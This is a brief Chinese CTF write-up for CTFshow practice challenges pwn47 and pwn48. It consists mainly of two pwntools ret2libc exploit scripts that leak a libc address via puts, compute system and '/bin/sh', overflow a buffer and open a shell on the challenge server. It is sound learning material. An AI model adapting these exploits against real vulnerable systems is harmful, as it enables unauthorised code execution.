CTFshow pwn47-48

CTFshow pwn47-48

ret2libc的两道简单练习。
还是很不熟练。

pwn47

已经给出了\bin\sh的字符串，还有输出了许多函数的地址，所以很容易拿到libc。

from pwn import *
from LibcSearcher import *
context(os = 'linux', arch = 'i386', log_level = 'debug')
io = remote("pwn.challenge.ctf.show",28106 )
elf = ELF('./pwn')
bin_sh = 0x804B028
io.recvuntil("puts: ")
puts_addr = eval(io.recvuntil("\n", drop = True))
libc = LibcSearcher('puts', puts_addr)
libc_case = puts_addr - libc.dump('puts')
system_addr = libc_case + libc.dump('system')
offset = 0x9c + 0x4
payload = offset * b'a'
payload += p32(system_addr)
payload += p32(0)
payload += p32(bin_sh)
io.sendline(payload)
io.interactive()

pwn48

有puts函数可以泄露地址，正常的ret2libc。

from pwn import *
from LibcSearcher import *
context(os = 'linux', arch = 'i386', log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28284)
elf = ELF('./pwn')
offset = 0x6B + 0x4
main_addr = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
payload = offset * b'a'
payload += p32(puts_plt)
payload += p32(main_addr)
payload += p32(puts_got)
io.sendline(payload)

#---------------

puts_addr = u32(io.recvuntil('\xf7')[-4:])
libc = LibcSearcher('puts', puts_addr)
libc_case = puts_addr - libc.dump('puts')
system_addr = libc_case + libc.dump('system')
bin_sh = libc_case + libc.dump('str_bin_sh')
payload = offset * b'a'
payload += p32(system_addr)
payload += p32(0)
payload += p32(bin_sh)
io.sendline(payload)
io.interactive()